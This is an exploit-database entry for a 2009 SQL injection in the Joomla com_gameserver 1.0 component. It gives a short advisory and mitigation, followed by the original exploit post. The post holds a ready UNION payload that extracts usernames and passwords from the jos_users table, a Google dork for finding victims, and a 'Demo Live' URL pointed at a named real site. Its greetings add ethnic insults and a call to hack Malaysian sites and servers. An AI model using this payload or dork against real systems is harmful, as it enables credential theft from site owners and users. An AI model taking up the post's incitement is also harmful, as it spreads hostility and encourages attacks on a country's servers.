Joomla Component com_gameserver 1.0 (id) SQL Injection Vulnerability

vendor:

Game Server Component

by:

v3n0m

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Game Server Component

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:indianpulse.in:gameserver_component:1.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Joomla Component com_gameserver 1.0 (id) SQL Injection Vulnerability

The vulnerability exists due to insufficient sanitization of user-supplied input in the 'id' parameter of the 'com_gameserver' component. A remote attacker can execute arbitrary SQL commands in application's database, cause denial of service, access or modify sensitive data, exploit various vulnerabilities in the underlying SQL server etc.

Mitigation:

Input validation should be used to prevent SQL injection attacks. The application should sanitize all user-supplied input to prevent SQL injection attacks.

Source

Exploit-DB raw data:

*************************************************************************
,   .                                       |          |    o     |    
|   |,---.,---.,   .,---.,---.,---.,---.,---|,---.,---.|    .,---.|__/ 
`---'|   ||   ||   |,---||    ,---||    |   ||---'|    |    ||   ||  \ 
  |  `---'`---|`---|`---^`---'`---^`    `---'`---'`    `---'``   '`   `
  `       `---'`---'                                                   
*************************************************************************
[o] Joomla Component com_gameserver 1.0 (id) SQL Injection Vulnerability

			--==[ Author ]==--
[+] Author	: v3n0m
[+] Contact	: v3n0m666[at]live[dot]com
[+] Blog	: http://0wnage.wordpress.com/
[+] Group	: YOGYACARDERLINK
[+] Site	: http://yogyacarderlink.web.id/
[+] Date	: September, 03rd 2009 [INDONESIA]
*************************************************************************
			--==[ Details ]==--
[+] Software	: Game Server Component
[+] Version 	: 1.0
[+] Vendor 	: http://www.indianpulse.in/
[+] License	: GPL
[+] Vulnerable	: SQL Injection
[+] Google Dork	: inurl:"com_gameserver"
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

[-] Exploit:
[+] 999999/**/and/**/1=2/**/union/**/select/**/group_concat(username,char(58),password)v3n0m/**/from/**/jos_users--

[-] SQLi p0c:
[+] http://127.0.0.1/[path]/index.php?option=com_gameserver&view=gamepanel&id=999999/**/and/**/1=2/**/union/**/select/**/group_concat(username,char(58),password)v3n0m/**/from/**/jos_users--

[-] Demo Live:
[+] http://www.jacker.ro/index.php?option=com_gameserver&view=gamepanel&id=999999/**/and/**/1=2/**/union/**/select/**/group_concat(username,char(58),password)v3n0m/**/from/**/jos_users--

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Special Thanks	=> str0ke & milw0rm
RedLine Crew	=> Bang Musa,Bang Yuan Rasugi Sang,Mas Andre,Dagol,Yazid
		=> Ogie,Angga,Indah Boing,by-y0u Pletokan,Andrew
YOGYACARDERLINK => lingah,leQhi,-Jali,Anak_Naga_,g0nz,IdioT_InsidE,aRiee
		=> yoga0400,ghareng,eidelweiss,pKi,kaka11,z0mb13,Travis Eshan
		=> & para gay yogyagaylink bruakakakakakakak
Others		=> g0par Santiago,Don Tukulesto,mixbrainwasher
		=> badkiddies,broken_hack,M364TR0N & ALL MOSLEM HACKERS
Big Thanks	=> mywisdom [nice 0-day, you're 31337]
		=> yadoy666 [Mari kita ganyang malingsianjink]
		=> Angela Chang [kamu cantik,eksotis & mengerikan] (=^_^=)

* Fuck to Malaysia <= the truly thief asia
  be carefull your culture art & song,island get stolen and claimed by them
  letz we hack they sites & servers !! PROUD TO BE INDONESIAN !!
* 02:55am dreaming alone about future & my old story in my bedroom

# milw0rm.com [2009-09-01]